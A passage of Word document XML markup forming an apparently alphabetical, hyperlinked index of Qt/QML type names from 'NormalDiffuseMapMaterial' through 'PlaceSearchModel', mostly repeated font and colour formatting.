                <w:t>NormalDiffuseMapAlphaMaterial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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NormalDiffuseMapMaterial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16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1120" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NormalDiffuseSpecularMapMaterial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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Number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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NumberAnimation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23" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>NumberKey</w:t>
              </w:r>
            </w:hyperlink>
            <w:bookmarkStart w:id="1176" w:name="o"/>
            <w:bookmarkEnd w:id="1176"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>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r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>O</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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ObjectModel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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ObjectPicker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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>OpacityAnimator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27" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>OpacityMask</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28" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>OpenGLInfo</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29" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>OrbitCameraController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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>OrientationReading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131" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>OrientationSensor</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77" w:name="p"/>
            <w:bookmarkEnd w:id="1177"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>P</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32" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Package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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Page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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PageIndicator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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Pane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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ParallelAnimation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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Parameter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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ParentAnimation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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ParentChange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140" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Particle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141" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ParticleGroup</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142" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ParticlePainter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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ParticleSystem</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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Path</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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathAnimation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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathArc</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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathAttribute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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathCubic</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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathCurve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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathElement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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathInterpolator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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathLine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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathPercent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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathQuad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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathSvg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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PathView</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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PauseAnimation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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PercentBarSeries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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PerVertexColorMaterial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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PhongAlphaMaterial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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PhongMaterial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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PickEvent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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PickingSettings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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PickTriangleEvent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65" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Picture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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PieMenu</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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PieMenuStyle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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PieSeries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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PieSlice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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PinchArea</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71" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PinchEvent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72" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Place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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlaceAttribute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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>PlaceSearchModel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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
